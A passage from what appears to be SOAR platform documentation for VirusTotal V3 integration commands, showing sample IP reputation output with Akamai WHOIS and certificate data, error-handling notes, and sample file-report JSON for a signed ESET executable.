'ADMINUSLabs'}, 'Scantitan': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Scantitan'}, 'IPsum': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'IPsum'}, 'Dr.Web': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Dr.Web'}, 'AlienVault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AlienVault'}, 'Sophos': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Sophos'}, 'http://malwares.com URL checker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://malwares.com URL checker'}, 'Abusix': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Abusix'}, 'Phishtank': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishtank'}, 'EonScope': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EonScope'}, 'Malwared': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Malwared'}, 'Avira': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Avira'}, 'NotMining': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'NotMining'}, 'Cyan': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Cyan'}, 'Antiy-AVL': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Antiy-AVL'}, 'http://SCUMWARE.org ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://SCUMWARE.org '}, 'Spam404': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Spam404'}, 'MalSilo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalSilo'}, 'ESTsecurity-Threat Inside': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESTsecurity-Threat Inside'}, 'Certego': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Certego'}, 'ESET': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ESET'}, 'Threatsourcing': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Threatsourcing'}, 'URLhaus': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'URLhaus'}, 'SecureBrain': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'SecureBrain'}, 'Webroot': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Webroot'}, 'PREBYTES': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PREBYTES'}, 'StopForumSpam': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'StopForumSpam'}, 'Blueliv': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Blueliv'}, 'Hoplite Industries': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Hoplite Industries'}, 'Netcraft': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'Netcraft'}, 'CRDF': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CRDF'}, 'ThreatHive': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ThreatHive'}, 'http://BADWARE.INFO ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://BADWARE.INFO '}, 'Forcepoint ThreatSeeker': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Forcepoint ThreatSeeker'}, 'Quick Heal': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Quick Heal'}, 'Tencent': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Tencent'}, 'StopBadware': {'category': 'undetected', 'result': 'unrated', 'method': 'blacklist', 'engine_name': 'StopBadware'}, 'Fortinet': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Fortinet'}, 'http://Bfore.Ai PreCrime': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://Bfore.Ai PreCrime'}, 'ZeroCERT': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'ZeroCERT'}, 'Baidu-International': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Baidu-International'}, 'Phishing Database': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Phishing Database'}, 'http://alphaMountain.ai ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://alphaMountain.ai '}}, 'reputation': 0, 'last_modification_date': 1625850459, 'total_votes': {'harmless': 0, 'malicious': 0}, 'last_https_certificate': {'size': 1326, 'public_key': {'ec': {'oid': '*****', 'pub': '*****'}, 'algorithm': 'EC'}, 'thumbprint_sha256': '*****', 'tags': [], 'cert_signature': {'signature': '*****', 'signature_algorithm': 'sha256ECDSA'}, 'validity': {'not_after': '2021-09-13 12:00:00', 'not_before': '2020-07-15 00:00:00'}, 'version': 'V3', 'extensions': {'certificate_policies': ['2.16.840.1.114412.1.1', '2.23.140.1.2.2'], 'extended_key_usage': ['serverAuth', 'clientAuth'], 'authority_key_identifier': {'keyid': '*****'}, 'subject_alternative_name': ['a248.e.akamai.net', '*.akamaized.net', '*.akamaihd-staging.net', '*.akamaihd.net', '*.akamaized-staging.net'], 'tags': [], 'subject_key_identifier': '*****', 'crl_distribution_points': ['http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl', 'http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl'], 'key_usage': ['ff'], '1.3.6.1.4.1.11129.2.4.2': '*****', 'CA': True, 'ca_information_access': {'CA Issuers': 'http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt', 'OCSP': 'http://ocsp.digicert.com '}}, 'signature_algorithm': 'sha256ECDSA', 'serial_number': '*****', 'thumbprint': '*****', 'issuer': {'C': 'US', 'CN': 'DigiCert Secure Site ECC CA-1', 'O': 'DigiCert Inc', 'OU': 'http://www.digicert.com '}, 'subject': {'C': 'US', 'ST': 'Massachusetts', 'CN': 'a248.e.akamai.net', 'O': 'Akamai Technologies, Inc.', 'L': 'Cambridge'}}, 'continent': 'NA', 'whois': ' Domain Name: AKAMAITECHNOLOGIES.COM\r\n Registry Domain ID: *****\r\n Registrar WHOIS Server: whois.akamai.com\r\n Registrar URL: http://www.akamai.com \r\n Updated Date: 2020-08-20T18:59:45Z\r\n Creation Date: 1998-08-18T04:00:00Z\r\n Registry Expiry Date: 2022-08-17T04:00:00Z\r\n Registrar: Akamai Technologies, Inc.\r\n Registrar IANA ID: 2480\r\n Registrar Abuse Contact Email: *****@*****.***\r\n Registrar Abuse Contact Phone: +1.*****\r\n Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited\r\n Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\r\n Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited\r\n Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited\r\n Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited\r\n Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited\r\n Name Server: AX0.AKAMAISTREAM.NET\r\n Name Server: AX1.AKAMAISTREAM.NET\r\n Name Server: AX2.AKAMAISTREAM.NET\r\n Name Server: AX3.AKAMAISTREAM.NET\r\n Name Server: NS2-32.AKAMAISTREAM.NET\r\n Name Server: NS3-32.AKAMAISTREAM.NET\r\n Name Server: NS6-32.AKAMAISTREAM.NET\r\n Name Server: P5.AKAMAISTREAM.NET\r\n Name Server: P6.AKAMAISTREAM.NET\r\n Name Server: P7.AKAMAISTREAM.NET\r\n Name Server: P8.AKAMAISTREAM.NET\r\n DNSSEC: unsigned\r\n URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/*****/\r\n>>> Last update of whois database: 2021-06-26T08:18:02Z <<<\r\n\r\nFor more information on Whois status codes, please visit https://icann.org/epp\r\n\r\nNOTICE: The expiration date displayed in this record is the date the\r\nregistrar\'s sponsorship of the domain name registration in the registry is\r\ncurrently set to expire. This date does not necessarily reflect the expiration\r\ndate of the domain name registrant\'s agreement with the sponsoring\r\nregistrar. Users may consult the sponsoring registrar\'s Whois database to\r\nview the registrar\'s reported date of expiration for this registration.\r\n\r\nTERMS OF USE: You are not authorized to access or query our Whois\r\ndatabase through the use of electronic processes that are high-volume and\r\nautomated except as reasonably necessary to register domain names or\r\nmodify existing registrations; the Data in VeriSign Global Registry\r\nServices\' ("VeriSign") Whois database is provided by VeriSign for\r\ninformation purposes only, and to assist persons in obtaining information\r\nabout or related to a domain name registration record. VeriSign does not\r\nguarantee its accuracy. By submitting a Whois query, you agree to abide\r\nby the following terms of use: You agree that you may use this Data only\r\nfor lawful purposes and that under no circumstances will you use this Data\r\nto: (1) allow, enable, or otherwise support the transmission of mass\r\nunsolicited, commercial advertising or solicitations via e-mail, telephone,\r\nor facsimile; or (2) enable high volume, automated, electronic processes\r\nthat apply to VeriSign (or its computer systems). The compilation,\r\nrepackaging, dissemination or other use of this Data is expressly\r\nprohibited without the prior written consent of VeriSign. You agree not to\r\nuse electronic processes that are automated and high-volume to access or\r\nquery the Whois database except as reasonably necessary to register\r\ndomain names or modify existing registrations. VeriSign reserves the right\r\nto restrict your access to the Whois database in its sole discretion to ensure\r\noperational stability. VeriSign may restrict or terminate your access to the\r\nWhois database for failure to abide by these terms of use. VeriSign\r\nreserves the right to modify these terms at any time.\r\n\r\nThe Registry database contains ONLY .COM, .NET, .EDU domains and\r\nRegistrars.\r\ndomain: akamaitechnologies.com\nDomainName: AKAMAITECHNOLOGIES.COM\nRegistry Domain ID: *****\nRegistrar WHOIS Server: whois.akamai.com\nRegistrar URL: http://www.akamai.com \nUpdated Date: 2020-08-20T18:59:45.0000Z\nCreation Date: 1998-08-18T04:00:00.0000Z\nRegistrar Registration Expiration Date: 2022-08-17T04:00:00.0000Z\nSponsoring Registrar: Akamai Technologies, INC.\nSponsoring Registrar IANA ID: 2480\nRegistrar Abuse Contact Email: *****@*****.***\nRegistrar Abuse Contact Phone: +1.*****\nDomain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited\nDomain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited\nDomain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited\nDomain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited\nDomain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited\nDomain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited\nRegistrant Name: Hostmaster Billing\nRegistrant Organization: Akamai Technologies, inc.\nRegistrant Street: 145 Broadway\nRegistrant City: Cambridge\nRegistrant State/Province: MA\nRegistrant Postal Code: 02142\nRegistrant Country: US\nRegistrant Phone: +1.6174443000\nRegistrant Phone Ext: \nRegistrant Fax: +1.6174443001\nRegistrant Fax Ext: \nRegistrant Email: hostmaster-billing@akamai.com\nAdmin Name: Hostmaster Billing\nAdmin Organization: Akamai Technologies, inc.\nAdmin Street: 145 Broadway\nAdmin City: Cambridge\nAdmin State/Province: MA\nAdmin Postal Code: 02142\nAdmin Country: US\nAdmin Phone: +1.6174443000\nAdmin Phone Ext: \nAdmin Fax: +1.6174443001\nAdmin Fax Ext: \nAdmin Email: hostmaster-billing@akamai.com\nTech Name: Hostmaster Billing\nTech Organization: Akamai Technologies, inc.\nTech Street: 145 Broadway\nTech City: Cambridge\nTech State/Province: MA\nTech Postal Code: 02142\nTech Country: US\nTech Phone: +1.6174443000\nTech Phone Ext: \nTech Fax: +1.6174443001\nTech Fax Ext: \nTech Email: hostmaster-billing@akamai.com\nBilling Name: Hostmaster Billing\nBilling Organization: Akamai Technologies, inc.\nBilling Street: 145 Broadway\nBilling City: Cambridge\nBilling State/Province: MA\nBilling Postal Code: 02142\nBilling Country: US\nBilling Phone: +1.6174443000\nBilling Phone Ext: \nBilling Fax: +1.6174443001\nBilling Fax Ext: \nBilling Email: hostmaster-billing@akamai.com\nName Server: AX0.AKAMAISTREAM.NET\nName Server: AX1.AKAMAISTREAM.NET\nName Server: AX2.AKAMAISTREAM.NET\nName Server: AX3.AKAMAISTREAM.NET\nName Server: NS2-32.AKAMAISTREAM.NET\nName Server: NS3-32.AKAMAISTREAM.NET\nName Server: NS6-32.AKAMAISTREAM.NET\nName Server: P5.AKAMAISTREAM.NET\nName Server: P6.AKAMAISTREAM.NET\nName Server: P7.AKAMAISTREAM.NET\nName Server: P8.AKAMAISTREAM.NET\nDNSSEC: unsigned\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\n >>> Last update of WHOIS database: 2021-06-26T07:55:01Z <<<\nFor more information on Whois status codes, please visit https://icann.org/epp\nNotice: By submitting a WHOIS query, you agree to abide by the following: This information\nNotice: is provided for the sole purpose of assisting you in obtaining information about\nNotice: domain name registration records and is made available on an "AS-IS" basis. \nNotice: Akamai Technologies makes no warranty as to the accuracy or completeness of the\nNotice: information provided by registrants for inclusion in the Akamai WHOIS database.\nNotice: You may use this data only for lawful purposes and that under no circumstances\nNotice: will you use this data to: (1) allow, enable, or otherwise support the \nNotice: transmission of mass unsolicited, commercial advertising or solicitations via\nNotice: direct mail, e-mail, telephone, or facsimile; or (2) enable high volume, \nNotice: automated, electronic processes that apply to Akamai Technologies (or its computer\nNotice: systems). Any use of this data for other purposes is prohibited without the prior \nNotice: written consent of Akamai Technologies.\n'}, 'type': 'ip_address', 'id': '***.***.***.***', 'links': {'self': 'https://www.virustotal.com/api/v3/ip_addresses/***.***.***.***'}}, {'attributes': {'regional_internet_registry': 'ARIN', 'network': '***.***.***.***/**', 'tags': [], 'country': 'US', 'as_owner': 'MICROSOFT-CORP-MSN-AS-BLOCK', 'last_analysis_stats': {'harmless': 84, 'malicious': 0, 'suspicious': 0, 'undetected': 0, 'timeout': 0}, 'asn': 8075, 'whois_date': 1623825782, 'last_analysis_results': {'CMC Threat Intelligence': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'CMC Threat Intelligence'}, 'DNS8': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'DNS8'}, 'Lionic': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Lionic'}, 'Snort IP sample list': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Snort IP sample list'}, 'AICC (MONITORAPP)': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'AICC (MONITORAPP)'}, 'http://benkow.cc ': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'http://benkow.cc '}, 'VX Vault': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'VX Vault'}, 'securolytics': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'securolytics'}, 'MalwarePatrol': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalwarePatrol'}, 'Armis': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Armis'}, 'MalBeacon': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'MalBeacon'}, 'Comodo Valkyrie Verdict': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'Comodo Valkyrie Verdict'}, 'PhishLabs': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'PhishLabs'}, 'EmergingThreats': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist', 'engine_name': 'EmergingThreats'}, 'zvelo': {'category': 'harmless', 'result': 'clean', 'method': 'blacklist |
Error Handling
If the Return Data is Partially Successful or Failed, an Error tab will appear in the Test Result window.
The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.
Parts in Error | Description | Example |
Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Get File Relationships failed. |
Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the VirusTotal V3 portal. Refer to the VirusTotal API Errors for details. | Status Code: 404. |
Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: File Hash Not Found. |
Error Sample Data Get File Relationships failed. Status Code: 404. Message: File Hash Not Found. |
Get File Reports
Retrieves information about the specified files.
Input
Input Parameter | Required/Optional | Description | Example |
File Hashes | Required | The file hash function values (SHA-256, SHA-1 or MD5) of the files to return corresponding report information. |
JSON
|
Output
The primary response data from the API request.
SAMPLE DATA
[
{
"data": {
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "*****",
"trid": [
{
"file_type": "Windows Control Panel Item (generic)",
"probability": 90.1
},
{
"file_type": "Win64 Executable (generic)",
"probability": 4.8
},
{
"file_type": "Win16 NE executable (generic)",
"probability": 2.3
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 0.9
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 0.9
}
],
"creation_date": 1605095799,
"names": [
"ekrn.exe",
"yFrRhBqUxIzE",
"jFoOxXfWlZcIpLcMkOz",
"rIj",
"eNeRhHm",
"hTbHaTzZnV",
"rMhNiMuJtNhXbG",
"oCmAyDmZiBmJoJ",
"fKaDcVdDnYpLuOiJc",
"nEpBnSlLmKoVpIqVkU",
"cDmQfGcVg",
"wClVwS",
"iFkAyEdYvXhE",
"tOvBoIt",
"nXdBkLpEzUtJjQtBv",
"jSgGoRhU",
"oWkAmMjTsVdBqXuRoW",
"ekrn"
],
"signature_info": {},
"last_modification_date": 1625773228,
"type_tag": "peexe",
"times_submitted": 14,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 2595360,
"type_extension": "exe",
"authentihash": "*****",
"last_submission_date": 1620603625,
"last_analysis_results": {},
"sha256": "*****",
"tags": [
"peexe",
"assembly",
"invalid-rich-pe-linker-version",
"overlay",
"signed",
"64bits"
],
"last_analysis_date": 1622784119,
"unique_sources": 5,
"first_submission_date": 1607509508,
"sha1": "*****",
"ssdeep": "49152:*****:*****/*****",
"md5": "*****",
"pe_info": {},
"magic": "PE32+ executable for MS Windows (GUI) Mono/.Net assembly",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 0,
"timeout": 0,
"failure": 2,
"malicious": 0,
"undetected": 69
},
"meaningful_name": "ekrn.exe",
"reputation": 0,
"first_seen_itw_date": 1605052706
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****"
}
}
}
]The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.
It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.
SAMPLE DATA
[
{
"data": {
"attributes": {
"type_description": "Win32 EXE",
"tlsh": "*****",
"vhash": "*****",
"trid": [
{
"file_type": "Windows Control Panel Item (generic)",
"probability": 90.1
},
{
"file_type": "Win64 Executable (generic)",
"probability": 4.8
},
{
"file_type": "Win16 NE executable (generic)",
"probability": 2.3
},
{
"file_type": "OS/2 Executable (generic)",
"probability": 0.9
},
{
"file_type": "Generic Win/DOS Executable",
"probability": 0.9
}
],
"creation_date": 1605095799,
"names": [
"ekrn.exe",
"yFrRhBqUxIzE",
"jFoOxXfWlZcIpLcMkOz",
"rIj",
"eNeRhHm",
"hTbHaTzZnV",
"rMhNiMuJtNhXbG",
"oCmAyDmZiBmJoJ",
"fKaDcVdDnYpLuOiJc",
"nEpBnSlLmKoVpIqVkU",
"cDmQfGcVg",
"wClVwS",
"iFkAyEdYvXhE",
"tOvBoIt",
"nXdBkLpEzUtJjQtBv",
"jSgGoRhU",
"oWkAmMjTsVdBqXuRoW",
"ekrn"
],
"signature_info": {},
"last_modification_date": 1625773228,
"type_tag": "peexe",
"times_submitted": 14,
"total_votes": {
"harmless": 0,
"malicious": 0
},
"size": 2595360,
"type_extension": "exe",
"authentihash": "*****",
"last_submission_date": 1620603625,
"last_analysis_results": {},
"sha256": "*****",
"tags": [
"peexe",
"assembly",
"invalid-rich-pe-linker-version",
"overlay",
"signed",
"64bits"
],
"last_analysis_date": 1622784119,
"unique_sources": 5,
"first_submission_date": 1607509508,
"sha1": "*****",
"ssdeep": "49152:*****:*****/*****",
"md5": "*****",
"pe_info": {},
"magic": "PE32+ executable for MS Windows (GUI) Mono/.Net assembly",
"last_analysis_stats": {
"harmless": 0,
"type-unsupported": 5,
"suspicious": 0,
"confirmed-timeout": 0,
"timeout": 0,
"failure": 2,
"malicious": 0,
"undetected": 69
},
"meaningful_name": "ekrn.exe",
"reputation": 0,
"first_seen_itw_date": 1605052706
},
"type": "file",
"id": "*****",
"links": {
"self": "https://www.virustotal.com/api/v3/files/*****"
}
}
}
]Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.
SAMPLE DATA
{
"Ids": [
"*****"
],
"SHA256s": [
"*****"
],
"SHA1s": [
"*****"
],
"MD5s": [
"*****"
],
"SSDEEPs": [
"49152:*****:*****/*****"
],
"TLSHs": [
"*****"
],
"VHASHs": [
"*****"
],
"MeaningfulName": [
"ekrn"
],
"Magics": [
"PE32+ executable for MS Windows (GUI) Mono/.Net assembly"
],
"HarmlessCounts": [
0
],
"MaliciousCounts": [
1
],
"SuspiciousCounts": [
2
],
"UndetectedCounts": [
69
],
"TypeUnsupportedCounts": [
5
],
"Reputations": [
0
],
"HarmlessVoteCounts": [
0
],
"MaliciousVoteCounts": [
0
]
}Indicates one of the possible command execution states: Successful, Partially Successful, or Failed.
The Partially Successful state only occurs when a command’s input accepts an array of items (e.g. an array of IP addresses) and one or more items within the array return an error from the API request.
The Failed state can be triggered by any of the following errors:
A connection issue with the integration
The API returned an error message
No response from the API
You can view more details about an error in the Error tab.
Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.
SAMPLE DATA
SuccessfulProvides a brief summary of outputs in an HTML formatted table.
SAMPLE DATA
DATA |
|---|
{'attributes': {'type_description': 'Win32 EXE', 'tlsh': '*****', 'vhash': '*****', 'trid': [{'file_type': 'Windows Control Panel Item (generic)', 'probability': 90.1}, {'file_type': 'Win64 Executable (generic)', 'probability': 4.8}, {'file_type': 'Win16 NE executable (generic)', 'probability': 2.3}, {'file_type': 'OS/2 Executable (generic)', 'probability': 0.9}, {'file_type': 'Generic Win/DOS Executable', 'probability': 0.9}], 'creation_date': 1605095799, 'names': ['ekrn.exe', 'yFrRhBqUxIzE', 'jFoOxXfWlZcIpLcMkOz', 'rIj', 'eNeRhHm', 'hTbHaTzZnV', 'rMhNiMuJtNhXbG', 'oCmAyDmZiBmJoJ', 'fKaDcVdDnYpLuOiJc', 'nEpBnSlLmKoVpIqVkU', 'cDmQfGcVg', 'wClVwS', 'iFkAyEdYvXhE', 'tOvBoIt', 'nXdBkLpEzUtJjQtBv', 'jSgGoRhU', 'oWkAmMjTsVdBqXuRoW', 'ekrn'], 'signature_info': {'product': 'ESET Security', 'verified': 'Signed', 'description': 'ESET Service', 'file version': '10.17.32.0', 'signing date': '11:58 AM 11/11/2020', 'x509': [{'name': 'DigiCert Assured ID Root CA', 'algorithm': 'sha1RSA', 'valid from': '2006-11-10 00:00:00', 'valid to': '2031-11-10 00:00:00', 'serial number': '0C E7 E0 E5 17 D8 46 FE 8F E5 60 FC 1B F0 30 39', 'cert issuer': 'DigiCert Assured ID Root CA', 'thumbprint': '0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43', 'valid_usage': None}, {'name': 'DigiCert High Assurance EV Root CA', 'algorithm': 'sha1RSA', 'valid from': '2006-11-10 00:00:00', 'valid to': '2031-11-10 00:00:00', 'serial number': '02 AC 5C 26 6A 0B 40 9B 8F 0B 79 F2 AE 46 25 77', 'cert issuer': 'DigiCert High Assurance EV Root CA', 'thumbprint': '5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25', 'valid_usage': None}, {'name': 'ESET Root Certificate Authority 2020', 'algorithm': 'sha256RSA', 'valid from': '2020-07-15 00:00:00', 'valid to': '2045-07-15 00:00:00', 'serial number': '3D 1F D8 47 F9 7A 4D 60 55 54 9F 7C D2 22 CF 46 53 9E 7B 34', 'cert issuer': 'ESET Root Certificate Authority 2020', 'thumbprint': '72DB19DEFEAA1B29221E8FFB7FCC64B7601EBD67', 'valid_usage': None}, {'name': 'GeoTrust Global CA', 'algorithm': 'sha1RSA', 'valid from': '2002-05-21 04:00:00', 'valid to': '2022-05-21 04:00:00', 'serial number': '02 34 56', 'cert issuer': 'GeoTrust Global CA', 'thumbprint': 'DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212', 'valid_usage': None}, {'name': 'Microsoft Code Verification Root', 'algorithm': 'sha1RSA', 'valid from': '2005-11-01 13:46:46', 'valid to': '2025-11-01 13:54:03', 'serial number': '72 94 04 10 1F 3E 0C A3 47 83 7F CA 17 5A 84 38', 'cert issuer': 'Microsoft Code Verification Root', 'thumbprint': '8FBE4D070EF8AB1BCCAF2A9D5CCAE7282A2C66B3', 'valid_usage': None}, {'name': 'VeriSign Universal Root Certification Authority', 'algorithm': 'sha256RSA', 'valid from': '2008-04-02 00:00:00', 'valid to': '2037-12-01 23:59:59', 'serial number': '40 1A C4 64 21 B3 13 21 03 0E BB E4 12 1A C5 1D', 'cert issuer': 'VeriSign Universal Root Certification Authority', 'thumbprint': '3679CA35668772304D30A5FB873B0FA77BB70D54', 'valid_usage': None}, {'name': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'algorithm': 'sha1RSA', 'valid from': '2006-11-08 00:00:00', 'valid to': '2036-07-16 23:59:59', 'serial number': '18 DA D1 9E 26 7D E8 BB 4A 21 58 CD CC 6B 3B 4A', 'cert issuer': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'thumbprint': '4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5', 'valid_usage': None}, {'name': 'Thawte Timestamping CA', 'algorithm': 'md5RSA', 'valid from': '1997-01-01 00:00:00', 'valid to': '2020-12-31 23:59:59', 'serial number': '00', 'cert issuer': 'Thawte Timestamping CA', 'thumbprint': 'BE36A4562FB2EE05DBB3D32323ADF445084ED656', 'valid_usage': None}, {'name': None, 'algorithm': '1.2.840.113549.1.1.2', 'valid from': '1996-01-29 00:00:00', 'valid to': '2028-08-01 23:59:59', 'serial number': '70 BA E4 1D 10 D9 29 34 B6 38 CA 7B 03 CC BA BF', 'cert issuer': None, 'thumbprint': '742C3192E607E424EB4549542BE1BBC53E6174E2', 'valid_usage': None}, {'name': 'ESET, spol. s r.o.', 'algorithm': 'sha256RSA', 'valid from': '2019-05-10 00:00:00', 'valid to': '2022-05-22 23:59:59', 'serial number': '65 62 8C 14 6A CE 93 03 7F C5 86 59 F1 4B D3 5F', 'cert issuer': 'Symantec Class 3 Extended Validation Code Signing CA - G2', 'thumbprint': 'B59165451BE46B8D72D09191D0961C755D0107C8', 'valid_usage': 'ff'}, {'name': 'Symantec Class 3 Extended Validation Code Signing CA - G2', 'algorithm': 'sha256RSA', 'valid from': '2014-03-04 00:00:00', 'valid to': '2024-03-03 23:59:59', 'serial number': '19 1A 32 CB 75 9C 97 B8 CF AC 11 8D D5 12 7F 49', 'cert issuer': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'thumbprint': '5B8F88C80A73D35F76CD412A9E74E916594DFA67', 'valid_usage': 'ff'}, {'name': 'VeriSign Class 3 Public Primary Certification Authority - G5', 'algorithm': 'sha1RSA', 'valid from': '2011-02-22 19:25:17', 'valid to': '2021-02-22 19:35:17', 'serial number': '61 19 93 E4 00 00 00 00 00 1C', 'cert issuer': 'Microsoft Code Verification Root', 'thumbprint': '57534CCC33914C41F70E2CBB2103A1DB18817D8B', 'valid_usage': None}, {'name': 'DigiCert SHA2 Assured ID Timestamping CA', 'algorithm': 'sha256RSA', 'valid from': '2016-01-07 12:00:00', 'valid to': '2031-01-07 12:00:00', 'serial number': '0A A1 25 D6 D6 32 1B 7E 41 E4 05 DA 36 97 C2 15', 'cert issuer': 'DigiCert Assured ID Root CA', 'thumbprint': '3BA63A6E4841355772DEBEF9CDCF4D5AF353A297', 'valid_usage': 'Timestamp Signing'}, {'name': 'DigiCert Assured ID Root CA', 'algorithm': 'sha1RSA', 'valid from': '2011-04-15 19:41:37', 'valid to': '2021-04-15 19:51:37', 'serial number': '61 1C B2 8A 00 00 00 00 00 26', 'cert issuer': 'Microsoft Code Verification Root', 'thumbprint': 'BA3EA54D72C145D37C255E1EA40AFBC63348B96E', 'valid_usage': None}, {'name': 'TIMESTAMP-SHA256-2019-10-15', 'algorithm': 'sha256RSA', 'valid from': '2019-10-01 00:00:00', 'valid to': '2030-10-17 00:00:00', 'serial number': '04 CD 3F 85 68 AE 76 C6 1B B0 FE 71 60 CC A7 6D', 'cert issuer': 'DigiCert SHA2 Assured ID Timestamping CA', 'thumbprint': '0325BD505EDA96302DC22F4FA01E4C28BE2834C5', 'valid_usage': 'ff'}], 'original name': 'ekrn.exe', 'signers': 'ESET, spol. s r.o.; Symantec Class 3 Extended Validation Code Signing CA - G2; VeriSign', 'counter signers details': [{'status': 'Valid', 'valid usage': 'Timestamp Signing', 'name': 